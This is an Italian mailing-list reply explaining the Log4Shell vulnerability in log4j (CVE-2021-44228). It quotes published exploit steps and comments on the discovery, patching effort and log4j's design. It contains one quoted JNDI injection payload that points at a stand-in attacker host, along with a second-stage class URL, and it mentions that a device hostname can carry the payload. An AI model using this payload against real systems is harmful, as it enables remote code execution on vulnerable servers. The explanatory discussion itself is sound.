Ciao Giacomo, buongiorno nexiane scusa Giacomo se mi permetto di fare l'egesi del tuo messaggio, ma riportato così rischia di rimanere un po' troppo criptico a chi non sa come funziona il "giro del fumo". ... ovviamente ho anche qualche commento :-) Giacomo Tesio <giacomo@tesio.it> writes:
Per la serie: "broken beyond repair"
Si tratta del CVE-2021-44228, aka Log4Shell Credo che il riassunto minimo più efficace sia questo: --8<---------------cut here---------------start------------->8--- By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. --8<---------------cut here---------------end--------------->8--- (https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-4422...) Per "submit a specially crafted request" non c'è bisogno di chissà quali tecniche di hacking, è sufficiente modificare il nome del proprio host (smartphone, Tesla...) [1] e contattare un servizio che usa log4j.
Il blog post è abbastanza tecnico ma la spiegazione di come fare a sfruttare il baco è abbastanza semplice: --8<---------------cut here---------------start------------->8--- 1. Data from the User gets sent to the server (via any protocol), 2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server), 3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI), 4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process, 5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. --8<---------------cut here---------------end--------------->8--- (https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps) Un elenco che /mi pare/ ben mantenuto è quello del Nationaal Cyber Security Centrum olandese: https://github.com/NCSC-NL/log4shell/tree/main/software Fa girare un po' la testa, effettivamente. ... Google non pervenuto?!? [...]
Siamo al livello di heartbleed e melt down, ma è il 2021.
Sì ma siamo IMHO /sotto/ al livello di SolarWinds, il peggio deve ancora manifestarsi perché le APT (advanced persistent threat) sono molto più subdole anche dei peggiori bachi come questo di log4j.
Chi crede che non sia stato exploitato per mesi prima di essere reso pubblico, non dovrebbe parlare di informatica in pubblico.
La libertà di credenza e di parola non si deve negare a nessuno. WIRED [2] scrive: --8<---------------cut here---------------start------------->8--- The organization (Apache Foundation, n.d.r.) says that Chen Zhaojun of Alibaba Cloud Security Team first disclosed the vulnerability. --8<---------------cut here---------------end--------------->8--- ...nel frattempo chissà cosa non hanno fatto con quella vulnerabilità. Il tempo medio di un APT (advanced persistent threat) /stimato/ va dai 71 giorni fino al 240, non è irragionecole stimare che la vulnerabilità di log4j sia stata disponibile fin da circa 100 giorni prima dell'annuncio. Comunque chi si occupa di sicurezza sa benissimo che non basta aggiornare log4j e amen, tocca reinstallare il sistema (quelli embedded inclusi, tipo gli IoT) da zero, con log4j aggiornato... e ovviamente rifare da zero i container Docker, vero?!? :-O Tanto lavoro, ma proprio tanto... forse troppo e per questo in molti casi non verrà fatto.
Invece, a chi sostiene che sia normale o inevitabile, andrebbe impedita qualsiasi professione legata all'informatica.
ROTFL. Sinceramente anche io non mi capacito di come i progettisti di log4j consentano l'uso di lookup JNDI dandogli in input qualsiasi cosa trovino in un /file di log/, consentendo così attacchi di tipo "JNDI injection" [3] a chiunque; bisogna proprio volersi male. Saluti 380° [1] https://nitter.net/chvancooten/status/1469340927923826691 [2] https://web.archive.org/web/20211210195812/https://www.wired.com/story/log4j... [3] https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/ «PSA: Log4Shell and the current state of JNDI injection» -- 380° (Giovanni Biscuolo public alter ego) «Noi, incompetenti come siamo, non abbiamo alcun titolo per suggerire alcunché» Disinformation flourishes because many people care deeply about injustice but very few check the facts. Ask me about <https://stallmansupport.org>.